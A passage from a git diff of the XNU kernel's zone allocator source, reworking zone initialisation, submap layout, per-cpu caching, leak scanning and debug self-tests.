== NULL || recsCntp == NULL) { - return KERN_INVALID_ARGUMENT; - } + mr = zone_init_allocate_va(0, alloc_size, ZIA_RANDOM); + + base = mr.min_address; + size = ZONE_GUARD_SIZE + hstart + ZONE_GUARD_SIZE; + if (bits_in_middle) { + size += bits_size; + br.min_address = base + ZONE_GUARD_SIZE + hstart; + br.max_address = br.min_address + bits_size; + } + zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE); - zone_ptr = ZONE_NULL; - zone_index_foreach(i) { - zone_t z = &zone_array[i]; + base += size; + size = mr.min_address + hend - base; + kmem_free(kernel_map, base, size); - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); + base = mr.min_address + hend; + size = mr.max_address - base; + zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE); - /* Find the requested zone by name */ - if (track_this_zone(temp_zone_name, name.mzn_name)) { - zone_ptr = z; - break; + mr.min_address += ZONE_GUARD_SIZE; + mr.max_address -= ZONE_GUARD_SIZE; + if (!bits_in_middle) { + br.max_address = mr.max_address; + mr.max_address -= bits_size; + br.min_address = mr.max_address; } + +#if DEBUG || DEVELOPMENT + printf("zone_init: metadata0 %p:%p (%zuK)\n", + (void *)mr.min_address, (void *)(mr.min_address + hstart), + (size_t)hstart >> 10); + printf("zone_init: metadata1 %p:%p (%zuK)\n", + (void *)(mr.min_address + hend), (void *)mr.max_address, + (size_t)(zone_range_size(&mr) - hend) >> 10); + printf("zone_init: metabits %p:%p (%zuK)\n", + (void *)br.min_address, (void *)br.max_address, + (size_t)zone_range_size(&br) >> 10); +#endif /* DEBUG || DEVELOPMENT */ } - /* No zones found with the requested zone name */ - if (zone_ptr == ZONE_NULL) { - return KERN_INVALID_ARGUMENT; + br.min_address = (br.min_address + ZBA_CHUNK_SIZE - 1) & -ZBA_CHUNK_SIZE; + br.max_address = br.max_address & -ZBA_CHUNK_SIZE; + + zone_info.zi_meta_range = mr; + zone_info.zi_bits_range = br; + + /* + * Migrate the original static metadata into its new location. + */ + zone_info.zi_meta_base = (struct zone_page_metadata *)mr.min_address - + zone_pva_from_addr(r0.min_address).packed_address; + foreign_base = zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address; + zone_meta_populate(foreign_base, zone_foreign_size()); + memcpy(zone_meta_from_addr(foreign_base), + zone_foreign_meta_array_startup, + atop(zone_foreign_size()) * sizeof(struct zone_page_metadata)); + + zba_populate(0); + memcpy(zba_base_header(), zba_chunk_startup, + sizeof(zba_chunk_startup)); +} + +/* Global initialization of Zone Allocator. + * Runs after zone_bootstrap. + */ +__startup_func +static void +zone_init(void) +{ + vm_size_t zone_map_size; + vm_size_t remaining_size; + vm_offset_t submap_min = 0; + uint64_t denom = 0; + uint64_t submap_ratios[Z_SUBMAP_IDX_COUNT] = { +#ifdef __LP64__ + [Z_SUBMAP_IDX_VA_RESTRICTED] = 20, +#else + [Z_SUBMAP_IDX_VA_RESERVE] = 10, +#endif /* defined(__LP64__) */ + [Z_SUBMAP_IDX_GENERAL] = 40, + [Z_SUBMAP_IDX_BAG_OF_BYTES] = 40, + }; + + if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) { + zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; + } else { + zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL; } + zone_phys_mapped_max_pages = (uint32_t)atop(zone_phys_size_max()); - /* Logging not turned on for the requested zone */ - if (!DO_LOGGING(zone_ptr)) { - return KERN_FAILURE; + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { +#if DEBUG || DEVELOPMENT + char submap_name[1 + sizeof("submap")]; + snprintf(submap_name, sizeof(submap_name), "submap%d", idx); + PE_parse_boot_argn(submap_name, &submap_ratios[idx], sizeof(uint64_t)); +#endif + denom += submap_ratios[idx]; } - /* Allocate memory for btlog records */ - numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog)); - recs_size = round_page(numrecs * sizeof *recs); +#if __LP64__ + zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64; +#else + zone_map_size = ptoa(zone_phys_mapped_max_pages * + (denom + submap_ratios[Z_SUBMAP_IDX_VA_RESERVE]) / denom); +#endif - kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; - } + remaining_size = zone_map_size - + ZONE_GUARD_SIZE * (zone_last_submap_idx + 1); /* - * We will call get_btlog_records() below which populates this region while holding a spinlock - * (the btlog lock). So these pages need to be wired. + * And now allocate the various pieces of VA and submaps. + * + * Make a first allocation of contiguous VA, that we'll deallocate, + * and we'll carve-out memory in that range again linearly. + * The kernel is stil single threaded at this stage. */ - kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size, - VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); - assert(kr == KERN_SUCCESS); - - recs = (zone_btrecord_t *)recs_addr; - get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs); - - kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE); - assert(kr == KERN_SUCCESS); - *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs); - *recsCntp = numrecs; + struct zone_map_range *map_range = + &zone_info.zi_map_range[ZONE_ADDR_NATIVE]; - return KERN_SUCCESS; + *map_range = zone_init_allocate_va(0, zone_map_size, ZIA_NONE); + submap_min = map_range->min_address; -#else /* DEBUG || DEVELOPMENT */ -#pragma unused(host, name, recsp, recsCntp) - return KERN_FAILURE; -#endif /* DEBUG || DEVELOPMENT */ -} + /* + * Allocate the submaps + */ + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { + zone_submap_init(&submap_min, idx, submap_ratios[idx], + &denom, &remaining_size, ZONE_GUARD_SIZE); + } + assert(submap_min == map_range->max_address); -#if DEBUG || DEVELOPMENT + zone_metadata_init(); -kern_return_t -mach_memory_info_check(void) -{ - mach_memory_info_t * memory_info; - mach_memory_info_t * info; - unsigned int num_info; - vm_offset_t memory_info_addr; - kern_return_t kr; - size_t memory_info_size, memory_info_vmsize; - uint64_t top_wired, zonestotal, total; +#if VM_MAX_TAG_ZONES + if (zone_tagging_on) { + zone_tagging_init(zone_map_size); + } +#endif +#if CONFIG_GZALLOC + gzalloc_init(zone_map_size); +#endif - num_info = vm_page_diagnose_estimate(); - memory_info_size = num_info * sizeof(*memory_info); - memory_info_vmsize = round_page(memory_info_size); - kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG); - assert(kr == KERN_SUCCESS); + zone_create_flags_t kma_flags = ZC_NOCACHING | + ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT | + ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; - memory_info = (mach_memory_info_t *) memory_info_addr; - vm_page_diagnose(memory_info, num_info, 0); + (void)zone_create_ext("vm.permanent", 1, kma_flags, + ZONE_ID_PERMANENT, ^(zone_t z){ + z->z_permanent = true; + z->z_elem_size = 1; +#if defined(__LP64__) + z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED; +#endif + }); + (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU, + ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){ + z->z_permanent = true; + z->z_elem_size = 1; +#if defined(__LP64__) + z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED; +#endif + }); - top_wired = total = zonestotal = 0; + /* + * Now migrate the startup statistics into their final storage. + */ + int cpu = cpu_number(); zone_index_foreach(idx) { - zonestotal += zone_size_wired(&zone_array[idx]); - } + zone_t tz = &zone_array[idx]; - for (uint32_t idx = 0; idx < num_info; idx++) { - info = &memory_info[idx]; - if (!info->size) { - continue; - } - if (VM_KERN_COUNT_WIRED == info->site) { - top_wired = info->size; - } - if (VM_KERN_SITE_HIDE & info->flags) { - continue; - } - if (!(VM_KERN_SITE_WIRED & info->flags)) { - continue; + if (tz->z_stats == __zpcpu_mangle_for_boot(&zone_stats_startup[idx])) { + zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats); + + *zpercpu_get_cpu(zs, cpu) = *zpercpu_get_cpu(tz->z_stats, cpu); + tz->z_stats = zs; +#if ZONE_ENABLE_LOGGING + if (tz->zone_logging && !tz->zlog_btlog) { + zone_enable_logging(tz); + } +#endif /* ZONE_ENABLE_LOGGING */ } - total += info->size; } - total += zonestotal; - printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n", - total, top_wired, zonestotal, top_wired - total); - - kmem_free(kernel_map, memory_info_addr, memory_info_vmsize); +#if CONFIG_ZLEAKS + /* + * Initialize the zone leak monitor + */ + zleak_init(zone_map_size); +#endif /* CONFIG_ZLEAKS */ - return kr; +#if VM_MAX_TAG_ZONES + if (zone_tagging_on) { + vm_allocation_zones_init(); + } +#endif } +STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init); -extern boolean_t(*volatile consider_buffer_cache_collect)(int); +__startup_func +static void +zone_cache_bootstrap(void) +{ + zone_t magzone; -#endif /* DEBUG || DEVELOPMENT */ + magzone = zone_create("zcc_magazine_zone", sizeof(struct zone_magazine) + + zc_mag_size() * sizeof(zone_element_t), + ZC_NOGZALLOC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE | + ZC_SEQUESTER | ZC_CACHING | ZC_ZFREE_CLEARMEM); + magzone->z_elems_rsv = (uint16_t)(2 * zpercpu_count()); -kern_return_t -mach_zone_force_gc( - host_t host) -{ - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + os_atomic_store(&zc_magazine_zone, magzone, compiler_acq_rel); -#if DEBUG || DEVELOPMENT - /* Callout to buffer cache GC to drop elements in the apfs zones */ - if (consider_buffer_cache_collect != NULL) { - (void)(*consider_buffer_cache_collect)(0); + /* + * Now that we are initialized, we can enable zone caching for zones that + * were made before zcache_bootstrap() was called. + * + * The system is still single threaded so we don't need to take the lock. + */ + zone_index_foreach(i) { + zone_t z = &zone_array[i]; + if (z->z_pcpu_cache) { + z->z_pcpu_cache = NULL; + zone_enable_caching(z); + } } - consider_zone_gc(FALSE); -#endif /* DEBUG || DEVELOPMENT */ - return KERN_SUCCESS; } +STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zone_cache_bootstrap); -zone_t -zone_find_largest(void) +void +zalloc_first_proc_made(void) { - uint32_t largest_idx = 0; - vm_offset_t largest_size = zone_size_wired(&zone_array[0]); + zone_caching_disabled = 0; +} - zone_index_foreach(i) { - vm_offset_t size = zone_size_wired(&zone_array[i]); - if (size > largest_size) { - largest_idx = i; - largest_size = size; - } +__startup_func +vm_offset_t +zone_foreign_mem_init(vm_size_t size) +{ + vm_offset_t mem; + + if (atop(size) > ZONE_FOREIGN_META_INLINE_COUNT) { + panic("ZONE_FOREIGN_META_INLINE_COUNT has become too small: " + "%d > %d", (int)atop(size), ZONE_FOREIGN_META_INLINE_COUNT); } - return &zone_array[largest_idx]; + mem = (vm_offset_t)pmap_steal_memory(size); + + zone_info.zi_meta_base = zone_foreign_meta_array_startup - + zone_pva_from_addr(mem).packed_address; + zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address = mem; + zone_info.zi_map_range[ZONE_ADDR_FOREIGN].max_address = mem + size; + + zone_info.zi_bits_range = (struct zone_map_range){ + .min_address = (vm_offset_t)zba_chunk_startup, + .max_address = (vm_offset_t)zba_chunk_startup + + sizeof(zba_chunk_startup), + }; + zba_init_chunk(0); + + return mem; } +#endif /* !ZALLOC_TEST */ #pragma mark - tests #if DEBUG || DEVELOPMENT @@ -6150,37 +8577,42 @@ zone_find_largest(void) * a second zinit() comes through before zdestroy()), which could lead us to * run out of zones. */ -SIMPLE_LOCK_DECLARE(zone_test_lock, 0); +static SIMPLE_LOCK_DECLARE(zone_test_lock, 0); static boolean_t zone_test_running = FALSE; static zone_t test_zone_ptr = NULL; static uintptr_t * -zone_copy_allocations(zone_t z, uintptr_t *elems, bitmap_t *bits, - zone_pva_t page_index, zone_addr_kind_t kind) +zone_copy_allocations(zone_t z, uintptr_t *elems, zone_pva_t page_index) { - vm_offset_t free, first, end, page; + vm_offset_t elem_size = zone_elem_size(z); + vm_offset_t base; struct zone_page_metadata *meta; while (!zone_pva_is_null(page_index)) { - page = zone_pva_to_addr(page_index); - meta = zone_pva_to_meta(page_index, kind); - end = page + ptoa(meta->zm_percpu ? 1 : meta->zm_page_count); - first = page + ZONE_PAGE_FIRST_OFFSET(kind); + base = zone_pva_to_addr(page_index); + meta = zone_pva_to_meta(page_index); - bitmap_clear(bits, (uint32_t)((end - first) / zone_elem_size(z))); + if (meta->zm_inline_bitmap) { + for (size_t i = 0; i < meta->zm_chunk_len; i++) { + uint32_t map = meta[i].zm_bitmap; - // construct bitmap of all freed elements - free = zone_page_meta_get_freelist(z, meta, page); - while (free) { - bitmap_set(bits, (uint32_t)((free - first) / zone_elem_size(z))); - - // next free element - free = *(vm_offset_t *)free ^ zp_nopoison_cookie; - } - - for (unsigned i = 0; first < end; i++, first += zone_elem_size(z)) { - if (!bitmap_test(bits, i)) { - *elems++ = INSTANCE_PUT(first); + for (; map; map &= map - 1) { + *elems++ = INSTANCE_PUT(base + + elem_size * __builtin_clz(map)); + } + base += elem_size * 32; + } + } else { + uint32_t order = zba_bits_ref_order(meta->zm_bitmap); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + for (size_t i = 0; i < (1u << order); i++) { + uint64_t map = bits[i]; + + for (; map; map &= map - 1) { + *elems++ = INSTANCE_PUT(base + + elem_size * __builtin_clzll(map)); + } + base += elem_size * 64; } } @@ -6200,13 +8632,12 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void * uint32_t idx, count, found; uint32_t btidx, btcount, nobtcount, btfound; uint32_t elemSize; - uint64_t maxElems; + size_t maxElems; kern_return_t kr; - bitmap_t *bits; - zone_index_foreach(i) { - if (!strncmp(zoneName, zone_array[i].z_name, nameLen)) { - zone = &zone_array[i]; + zone_foreach(z) { + if (!strncmp(zoneName, z->z_name, nameLen)) { + zone = z; break; } } @@ -6214,40 +8645,30 @@ zone_leaks(const char * zoneName, uint32_t nameLen, leak_site_proc proc, void * return KERN_INVALID_NAME; } - elemSize = zone_elem_size(zone); - maxElems = (zone->countavail + 1) & ~1ul; + elemSize = (uint32_t)zone_elem_size(zone); + maxElems = (zone->z_elems_avail + 1) & ~1ul; - if ((ptoa(zone->percpu ? 1 : zone->alloc_pages) % elemSize) && + if ((ptoa(zone->z_percpu ? 1 : zone->z_chunk_pages) % elemSize) && !zone_leaks_scan_enable) { return KERN_INVALID_CAPABILITY; } kr = kmem_alloc_kobject(kernel_map, (vm_offset_t *) &array, - maxElems * sizeof(uintptr_t) + BITMAP_LEN(ZONE_CHUNK_MAXELEMENTS), - VM_KERN_MEMORY_DIAG); + maxElems * sizeof(uintptr_t), VM_KERN_MEMORY_DIAG); if (KERN_SUCCESS != kr) { return kr; } - /* maxElems is a 2-multiple so we're always aligned */ - bits = CAST_DOWN_EXPLICIT(bitmap_t *, array + maxElems); - - lock_zone(zone); + zone_lock(zone); next = array; - next = zone_copy_allocations(zone, next, bits, - zone->pages_any_free_foreign, ZONE_ADDR_FOREIGN); - next = zone_copy_allocations(zone, next, bits, - zone->pages_all_used_foreign, ZONE_ADDR_FOREIGN); - next = zone_copy_allocations(zone, next, bits, - zone->pages_intermediate, ZONE_ADDR_NATIVE); - next = zone_copy_allocations(zone, next, bits, - zone->pages_all_used, ZONE_ADDR_NATIVE); + next = zone_copy_allocations(zone, next, zone->z_pageq_partial); + next = zone_copy_allocations(zone, next, zone->z_pageq_full); count = (uint32_t)(next - array); - unlock_zone(zone); + zone_unlock(zone); - zone_leaks_scan(array, count, zone_elem_size(zone), &found); + zone_leaks_scan(array, count, (uint32_t)zone_elem_size(zone), &found); assert(found <= count); for (idx = 0; idx < count; idx++) { @@ -6310,6 +8731,8 @@ run_zone_test(void) unsigned int i = 0, max_iter = 5; void * test_ptr; zone_t test_zone; + zone_t test_pcpu_zone; + kern_return_t kr; simple_lock(&zone_test_lock, &zone_locks_grp); if (!zone_test_running) { @@ -6332,9 +8755,9 @@ run_zone_test(void) } #if KASAN_ZALLOC - if (test_zone_ptr == NULL && test_zone->countfree != 0) { + if (test_zone_ptr == NULL && test_zone->z_elems_free != 0) { #else - if (test_zone->countfree != 0) { + if (test_zone->z_elems_free != 0) { #endif printf("run_zone_test: free count is not zero\n"); return FALSE; @@ -6367,15 +8790,16 @@ run_zone_test(void) int idx, num_allocs = 8; vm_size_t elem_size = 2 * PAGE_SIZE / num_allocs; void *allocs[num_allocs]; - vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_count, relaxed); - vm_size_t zone_map_size = zone_range_size(&zone_info.zi_map_range); + void **allocs_pcpu; + vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); test_zone = zone_create("test_zone_sysctl", elem_size, ZC_DESTRUCTIBLE | ZC_SEQUESTER); - if (test_zone == NULL) { - printf("run_zone_test: zinit() failed\n"); - return FALSE; - } + assert(test_zone); + + test_pcpu_zone = zone_create("test_zone_sysctl.pcpu", sizeof(uint64_t), + ZC_DESTRUCTIBLE | ZC_SEQUESTER | ZC_PERCPU); + assert(test_pcpu_zone); for (idx = 0; idx < num_allocs; idx++) { allocs[idx] = zalloc(test_zone); @@ -6385,63 +8809,105 @@ run_zone_test(void) for (idx = 0; idx < num_allocs; idx++) { zfree(test_zone, allocs[idx]); } - assert(!zone_pva_is_null(test_zone->pages_all_free)); + assert(!zone_pva_is_null(test_zone->z_pageq_empty)); + + kr = kernel_memory_allocate(kernel_map, + (vm_address_t *)&allocs_pcpu, PAGE_SIZE, + 0, KMA_ZERO | KMA_KOBJECT, VM_KERN_MEMORY_DIAG); + assert(kr == KERN_SUCCESS); + + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone, + Z_WAITOK | Z_ZERO); + assert(NULL != allocs_pcpu[idx]); + } + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]); + } + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); - printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n", + printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n", vm_page_wire_count, vm_page_free_count, - (100ULL * ptoa_64(phys_pages)) / zone_map_size); - zone_gc(FALSE); - printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %qd%%\n", + 100L * phys_pages / zone_phys_mapped_max_pages); + zone_gc(ZONE_GC_DRAIN); + printf("vm_page_wire_count %d, vm_page_free_count %d, p to v %ld%%\n", vm_page_wire_count, vm_page_free_count, - (100ULL * ptoa_64(phys_pages)) / zone_map_size); + 100L * phys_pages / zone_phys_mapped_max_pages); + unsigned int allva = 0; - zone_index_foreach(zidx) { - zone_t z = &zone_array[zidx]; - lock_zone(z); - allva += z->page_count; - if (!z->sequester_page_count) { - unlock_zone(z); + + zone_foreach(z) { + zone_lock(z); + allva += z->z_wired_cur; + if (zone_pva_is_null(z->z_pageq_va)) { + zone_unlock(z); continue; } unsigned count = 0; uint64_t size; - zone_pva_t pg = z->pages_sequester; + zone_pva_t pg = z->z_pageq_va; struct zone_page_metadata *page_meta; while (pg.packed_address) { - page_meta = zone_pva_to_meta(pg, ZONE_ADDR_NATIVE); - count += z->alloc_pages; + page_meta = zone_pva_to_meta(pg); + count += z->z_percpu ? 1 : z->z_chunk_pages; + if (page_meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + count -= page_meta->zm_page_index; + } pg = page_meta->zm_page_next; } - assert(count == z->sequester_page_count); + assert(z->z_wired_cur + count == z->z_va_cur); size = zone_size_wired(z); if (!size) { size = 1; } printf("%s%s: seq %d, res %d, %qd %%\n", - zone_heap_name(z), z->z_name, z->sequester_page_count, - z->page_count, zone_size_allocated(z) * 100ULL / size); - unlock_zone(z); + zone_heap_name(z), z->z_name, z->z_va_cur - z->z_wired_cur, + z->z_wired_cur, zone_size_allocated(z) * 100ULL / size); + zone_unlock(z); } printf("total va: %d\n", allva); - assert(zone_pva_is_null(test_zone->pages_all_free)); - assert(!zone_pva_is_null(test_zone->pages_sequester)); - assert(2 == test_zone->sequester_page_count); + assert(zone_pva_is_null(test_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_zone->z_pageq_partial)); + assert(!zone_pva_is_null(test_zone->z_pageq_va)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_partial)); + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_va)); + for (idx = 0; idx < num_allocs; idx++) { assert(0 == pmap_find_phys(kernel_pmap, (addr64_t)(uintptr_t) allocs[idx])); } + + /* make sure the zone is still usable after a GC */ + for (idx = 0; idx < num_allocs; idx++) { allocs[idx] = zalloc(test_zone); assert(allocs[idx]); printf("alloc[%d] %p\n", idx, allocs[idx]); } - assert(zone_pva_is_null(test_zone->pages_sequester)); - assert(0 == test_zone->sequester_page_count); + assert(zone_pva_is_null(test_zone->z_pageq_va)); + assert(test_zone->z_wired_cur == test_zone->z_va_cur); for (idx = 0; idx < num_allocs; idx++) { zfree(test_zone, allocs[idx]); } + + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + allocs_pcpu[idx] = zalloc_percpu(test_pcpu_zone, + Z_WAITOK | Z_ZERO); + assert(NULL != allocs_pcpu[idx]); + } + for (idx = 0; idx < PAGE_SIZE / sizeof(uint64_t); idx++) { + zfree_percpu(test_pcpu_zone, allocs_pcpu[idx]); + } + + assert(!zone_pva_is_null(test_pcpu_zone->z_pageq_empty)); + assert(zone_pva_is_null(test_pcpu_zone->z_pageq_va)); + + kmem_free(kernel_map, (vm_address_t)allocs_pcpu, PAGE_SIZE); + zdestroy(test_zone); + zdestroy(test_pcpu_zone); } else { printf("run_zone_test: skipping sequester test (not enabled)\n"); } @@ -6463,7 +8929,7 @@ run_zone_test(void) void zone_gc_replenish_test(void) { - zone_gc(FALSE); + zone_gc(ZONE_GC_DRAIN); } @@ -6478,8 +8944,7 @@ zone_alloc_replenish_test(void) */ zone_index_foreach(i) { z = &zone_array[i]; - if (z->prio_refill_count && - zone_elem_size(z) >= sizeof(struct data)) { + if (z->z_replenishes && zone_elem_size(z) >= sizeof(struct data)) { z = &zone_array[i]; break; } diff --git a/osfmk/kern/zalloc.h b/osfmk/kern/zalloc.h index 541de3bdd..0a6d7fb56 100644 --- a/osfmk/kern/zalloc.h +++ b/osfmk/kern/zalloc.h @@ -425,6 +425,15 @@ extern void *zalloc_permanent( #define zalloc_permanent_type(type_t) \ ((type_t *)zalloc_permanent(sizeof(type_t), ZALIGN(type_t))) +/*! + * @function zalloc_first_proc_made() + * + * @abstract + * Declare that the "early" allocation phase is done. + */ +extern void +zalloc_first_proc_made(void); + #pragma mark XNU only: per-cpu allocations /*! @@ -692,6 +701,7 @@ __enum_decl(zone_reserved_id_t, zone_id_t, { ZONE_ID_PROC, ZONE_ID_VM_MAP_COPY, ZONE_ID_PMAP, + ZONE_ID_VM_MAP, ZONE_ID__FIRST_DYNAMIC, }); @@ -727,6 +737,7 @@ const char *zone_heap_name( * @param zone the specified zone * @returns the zone (sub)map this zone allocates from. */ +__pure2 extern vm_map_t zone_submap( zone_t zone); @@ -813,6 +824,8 @@ extern zone_t zone_create_ext( * - isn't sensitive to @c zone_t::elem_size being compromised, * - is slightly faster as it saves one load and a multiplication. * + * @warning: zones using foreign memory can't use this interface. + * * @param zone_id the zone ID the address needs to belong to. * @param elem_size the size of elements for this zone. * @param addr the element address to check. @@ -822,30 +835,47 @@ extern void zone_id_require( vm_size_t elem_size, void *addr); +/*! + * @function zone_id_require_allow_foreign + * + * @abstract + * Requires for a given pointer to belong to the specified zone, by ID and size. + * + * @discussion + * This is a version of @c zone_id_require() that works with zones allowing + * foreign memory. + */ +extern void zone_id_require_allow_foreign( + zone_id_t zone_id, + vm_size_t elem_size, + void *addr); + /* * Zone submap indices * - * Z_SUBMAP_IDX_VA_RESTRICTED_MAP (LP64) + * Z_SUBMAP_IDX_VA_RESTRICTED (LP64) * used to restrict VM allocations lower in the kernel VA space, * for pointer packing * - * Z_SUBMAP_IDX_GENERAL_MAP + * Z_SUBMAP_IDX_VA_RESERVE (ILP32) + * used to keep a reserve of VA space for the urgent allocations + * backing allocations of crucial VM types (fictious pages, holes, ...) + * + * Z_SUBMAP_IDX_GENERAL * used for unrestricted allocations * - * Z_SUBMAP_IDX_BAG_OF_BYTES_MAP + * Z_SUBMAP_IDX_BAG_OF_BYTES * used to sequester bags of bytes from all other allocations and allow VA reuse * within the map */ -#if !defined(__LP64__) -#define Z_SUBMAP_IDX_GENERAL_MAP 0 -#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP 1 -#define Z_SUBMAP_IDX_COUNT 2 +#if defined(__LP64__) +#define Z_SUBMAP_IDX_VA_RESTRICTED 0 #else -#define Z_SUBMAP_IDX_VA_RESTRICTED_MAP 0 -#define Z_SUBMAP_IDX_GENERAL_MAP 1 -#define Z_SUBMAP_IDX_BAG_OF_BYTES_MAP 2 -#define Z_SUBMAP_IDX_COUNT 3 +#define Z_SUBMAP_IDX_VA_RESERVE 0 #endif +#define Z_SUBMAP_IDX_GENERAL 1 +#define Z_SUBMAP_IDX_BAG_OF_BYTES 2 +#define Z_SUBMAP_IDX_COUNT 3 /* Change zone sub-map, to be called from the zone_create_ext() setup hook */ extern void zone_set_submap_idx( @@ -855,23 +885,30 @@ extern void zone_set_submap_idx( /* Make zone as non expandable, to be called from the zone_create_ext() setup hook */ extern void zone_set_noexpand( zone_t zone, - vm_size_t maxsize); + vm_size_t max_elements); /* Make zone exhaustible, to be called from the zone_create_ext() setup hook */ extern void zone_set_exhaustible( zone_t zone, - vm_size_t maxsize); + vm_size_t max_elements); -/* Initially fill zone with specified number of elements */ -extern int zfill( - zone_t zone, - int nelem); - -/* Fill zone with memory */ -extern void zcram( +/*! + * @function zone_fill_initially + * + * @brief + * Initially fill a non collectable zone to have the specified amount of + * elements. + * + * @discussion + * This function must be called on a non collectable permanent zone before it + * has been used yet. + * + * @param zone The zone to fill. + * @param nelems The number of elements to be able to hold. + */ +extern void zone_fill_initially( zone_t zone, - vm_offset_t newmem, - vm_size_t size); + vm_size_t nelems); #pragma mark XNU only: misc & implementation details @@ -940,6 +977,26 @@ extern void zone_view_startup_init( #define __zpcpu_cast(ptr, e) ((typeof(ptr))(e)) #define __zpcpu_next(ptr) __zpcpu_cast(ptr, __zpcpu_addr(ptr) + PAGE_SIZE) +/** + * @macro __zpcpu_mangle_for_boot() + * + * @discussion + * Per-cpu variables allocated in zones (as opposed to percpu globals) that need + * to function early during boot (before @c STARTUP_SUB_ZALLOC) might use static + * storage marked @c __startup_data and replace it with the proper allocation + * at the end of the @c STARTUP_SUB_ZALLOC phase (@c STARTUP_RANK_LAST). + * + * However, some devices boot from a cpu where @c cpu_number() != 0. This macro + * provides the proper mangling of the storage into a "fake" percpu pointer so + * that accesses through @c zpercpu_get() functions properly. + * + * This is invalid to use after the @c STARTUP_SUB_ZALLOC phase has completed. + */ +#define __zpcpu_mangle_for_boot(ptr) ({ \ + assert(startup_phase < STARTUP_SUB_ZALLOC); \ + __zpcpu_cast(ptr, __zpcpu_mangle(__zpcpu_addr(ptr) - ptoa(cpu_number()))); \ +}) + extern unsigned zpercpu_count(void) __pure2; diff --git a/osfmk/kern/zalloc_internal.h b/osfmk/kern/zalloc_internal.h index 9fff60429..366ce538e 100644 --- a/osfmk/kern/zalloc_internal.h +++ b/osfmk/kern/zalloc_internal.h @@ -63,28 +63,15 @@ #include #include #include -#include #include +#include #if KASAN -#include #include -/* - * Set to 0 to debug poisoning and ZC_ZFREE_CLEARMEM validation under kasan. - * Otherwise they are double-duty with what kasan already does. - */ -#define ZALLOC_ENABLE_POISONING 0 -#else /* !KASAN */ -#define ZALLOC_ENABLE_POISONING 1 +#include #endif /* !KASAN */ -#if DEBUG || DEVELOPMENT -#define ZALLOC_DETAILED_STATS 1 -#else -#define ZALLOC_DETAILED_STATS 0 -#endif - /*! * @file * @@ -140,11 +127,12 @@ typedef struct zone_packed_virtual_address { struct zone_stats { uint64_t zs_mem_allocated; uint64_t zs_mem_freed; -#if ZALLOC_DETAILED_STATS - uint64_t zs_mem_wasted; -#endif /* ZALLOC_DETAILED_STATS */ + uint32_t zs_poison_seqno; /* counter for poisoning every N frees */ + uint32_t zs_alloc_rr; /* allocation rr bias */ }; +STAILQ_HEAD(zone_depot, zone_magazine); + struct zone { /* * Readonly / rarely written fields @@ -160,52 +148,47 @@ struct zone { zone_stats_t z_stats; const char *z_name; struct zone_view *z_views; -#ifdef CONFIG_ZCACHE - struct zone_cache zcache; -#endif /* CONFIG_ZCACHE */ - uint16_t alloc_pages; /* size used for more memory in pages */ - uint16_t z_elem_size; /* size of an element */ - uint16_t pcpu_elem_size; - uint16_t prio_refill_count; /* if !=0 , refill to this count */ - uint32_t page_count_max; /* how large can this zone grow */ + struct thread *z_expander; + struct zone_cache *__zpercpu z_pcpu_cache; - uint32_t page_count_hwm; /* page_count high watermark */ - uint32_t page_count; /* number of pages used by this zone */ - uint32_t countavail; /* Number of elements available */ + 